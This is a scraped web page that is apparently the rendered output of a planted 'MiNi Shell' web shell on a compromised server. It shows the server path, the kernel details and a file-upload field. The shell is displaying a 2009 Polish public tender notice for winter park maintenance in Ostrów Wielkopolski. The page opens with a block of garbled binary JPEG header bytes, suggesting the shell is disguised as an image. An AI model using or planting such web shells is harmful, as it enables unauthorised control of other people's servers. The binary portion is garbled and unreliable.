JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162543-N-2009.html

<p class="kh_header"><b>Ostrów Wielkopolski: Zimowe utrzymanie parków, skwerów i zieleńców na terenie Ostrowa Wielkopolskiego
w okresie od 15.11.2009 do 15.03.2010 r.</b><br>
<b>Numer ogłoszenia: 162543 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Rejtana 54, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 7352576, faks 062 7352664.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzd.osw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie parków, skwerów i zieleńców na terenie Ostrowa Wielkopolskiego
w okresie od 15.11.2009 do 15.03.2010 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -	 Sprzątanie powierzchni parkowych, opróżnianie i wywóz śmieci z koszy przy alejkach
-	Sprzątanie śmieci z trawników, skwerów,
-	W okresie opadów śniegu i występowania śliskości odśnieżanie i posypywanie piaskiem alejek parkowych,
-	Przygotowanie środków transportowych i sprzętowych zimowego utrzymania do ewentualnych całodobowych dyżurów.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1500,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24, ust 1 i 2,  
    spełniający warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień 
     publicznych.

-	Posiadają uprawnienia do wykonywania przedmiotowej działalności.

-	Posiadają niezbędną wiedzę i doświadczenie do realizacji zamówienia wskazanego w opisie przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
            Wykonawca przystępujący do przetargu musi wykazać się zrealizowanymi (jako główny 
            wykonawca) w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, (a jeżeli  okres 
           prowadzenia działalności jest krótszy -  w tym okresie) min. 3 przedsięwzięciami o charakterze i 
           złożoności porównywalnej z przedmiotem zamówienia potwierdzonymi dokumentami, że usługi te 
           zostały wykonane należycie.

-	Posiadają niezbędny  potencjał sprzętowy do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego.

-	Posiadają w dyspozycji  wykwalifikowany personel odpowiedzialny za prawidłowe wykonanie zamówienia  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 

-	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 

-	Nie podlega wykluczeniu z postępowania o udzielenie zamówienia.

-	Posiadają zezwolenie lub umowę z przedsiębiorstwem posiadającym zezwolenie na zbieranie i 
       transport odpadów komunalnych grupy 20 02 na terenie Ostrowa Wielkopolskiego.

Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie dokumentów określonych w pkt. 7 SIWZ, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia     16 października 2008 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, SIWZ oraz ustawy - Prawo Zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7. l. Formularz oferty /(na załączonym druku/)
7.2. Dowód wpłacenia ( wniesienia) wadium .

7.3. Dane dotyczące sytuacji ekonomicznej i finansowej.     
1)	Aktualny odpis z właściwego rejestru  albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  Profil działania Wykonawcy musi odpowiadać przedmiotowi zamówienia.                  Odpis musi zawierać aktualny wykaz osób uprawnionych do reprezentowania wykonawcy.    
 
      Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast w/w dokumentów składa dokument lub dokumenty wystawione i obowiązujące w danym 
      kraju, potwierdzające odpowiednio że nie otwarto jego likwidacji ani nie ogłoszono upadłości, że nie 
      zalega z uiszczeniem podatków  opłat, składek na ubezpieczenie społeczne i zdrowotne albo że 
      uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
     wstrzymanie w całości  wykonania decyzji właściwego organu, że nie orzeczono wobec niego zakazu 
     ubiegania się o  zamówienie.                                   
.                              
       1) Oświadczenie w trybie Art. 22 ust. 1 ustawy, (druk w załączeniu)
2)	Oświadczenie w trybie Art. 24 ust. 1  i  2 ustawy, (druk w załączeniu)
3)   Pełnomocnictwo w oryginale do podpisania oferty. (Pełnomocnictwo nie jest wymagane jeżeli 
      podpisujący jest lub są właścicielami przedsiębiorstwa lub jeżeli są oni wymienieni z imienia i 
      nazwiska w odnośnym dokumencie rejestracyjnym)  
.      4)  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca 
            nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem  
            zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub  wstrzymanie w całości 
            wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące 
            przed upływem terminu składania ofert. 


       5)   Zaświadczenie z właściwego oddziału  Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 
             Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na 
             ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem  
             zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub  wstrzymanie w całości 
             wykonania decyzji  właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące 
             przed upływem terminu składania ofert.     

      Jeżeli wykonawca  ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast dokumentów wymaganych w punktach 5 i 6 SIWZ wykonawca składa dokument lub 
     dokumenty wystawione i obowiązujące w danym  kraju, potwierdzające odpowiednio że nie otwarto 
      jego likwidacji ani nie ogłoszono upadłości, że nie zalega z uiszczeniem podatków  opłat, składek na 
     ubezpieczenie społeczne i zdrowotne albo że  uzyskał przewidziane prawem  zwolnienie, odroczenie 
     lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego 
     organu, że nie orzeczono wobec niego zakazu ubiegania się o  zamówienie.                                   

7)	Oświadczenie finansowe, że oferent posiada środki finansowe do realizacji robót. 
8)	Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada podstawowy rachunek bankowy potwierdzającej wysokość posiadanych środków finansowych lub zdolność  kredytową wykonawcy. Wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
      8)   Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
             wykonaniu zamówienia z  udokumentowaniem ich doświadczenia i kwalifikacji zawodowych                 
       (druk w załączeniu). 
9) Wykaz  niezbędnego do wykonania zamówienia sprzętu którym dysponuje lub będzie dysponował 
       wykonawca, (druk w załączeniu).
Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego do wykonania zamówienia sprzętu jeżeli w wykazie o którym mowa powyżej wykonawca wskazał sprzęt którym będzie dysponował.
10) Wykaz zrealizowanych w ciągu ostatnich trzech lat min. 3 zamówień tożsamych z przedmiotem  
      zamówienia z podaniem ich wartości przedmiotu, daty wykonania wraz z załączeniem dokumentów 
      potwierdzających, że zamówienia te zostały wykonane należycie.
7.5. Umowa spółki cywilnej jeżeli ofertę składa spółka cywilna, dokumenty rejestrowe wszystkich
 współwłaścicieli.
7.5. Wykaz - wskazanie części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom. 
 7.6. Projekt umowy zaakceptowany (podpisany) przez Wykonawcę lub umocowanego przedstawiciela 
         Wykonawcy (druk w załączeniu).
 7.7. Oświadczenie o dokonaniu wizji lokalnej na terenach objętych umowa oraz zapoznaniu się z 
        asortymentem przewidzianych w umowie prac.
7.8.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust.1, pkt.4 - 8 
        ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania   
        ofert.   
      Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast w/w dokumentu składa zaświadczenie właściwego organu sądowego lub administracyjnego 
      kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym                 
     w art. 42, ust. 1, pkt. 4 - 8 ustawy.
7.9.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1, pkt. 9 
        ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - jeżeli 
        dotyczy.
      Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast w/w dokumentów składa dokument lub dokumenty wystawione i obowiązujące w danym 
      kraju, potwierdzające odpowiednio że nie otwarto jego likwidacji ani nie ogłoszono upadłości, że nie 
      zalega z uiszczeniem podatków  opłat, składek na ubezpieczenie społeczne i zdrowotne albo że 
      uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
     wstrzymanie w całości  wykonania decyzji właściwego organu, że nie orzeczono wobec niego zakazu 
     ubiegania się o  zamówienie.   
7.10. Zezwolenie lub umowa z przedsiębiorstwem posiadającym zezwolenie na zbieranie i 
    transport odpadów komunalnych grupy 20 02 na terenie Ostrowa Wielkopolskiego.
7.11. Oświadczenie o ilości stron dokumentacji przetargowej.
7.12. Wykaz stron objętych tajemnicą handlową przedsiębiorstwa zgodnie z art. 8 ust. 3 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzd.osw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg, ul. Zamenhofa 2b, 63-400 Ostrów Wielkopolski - pok. nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2009 godzina 08:30, miejsce: Miejski Zarząd Dróg, ul. Zamenhofa 2b, 63-400 Ostrów Wielkopolski - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com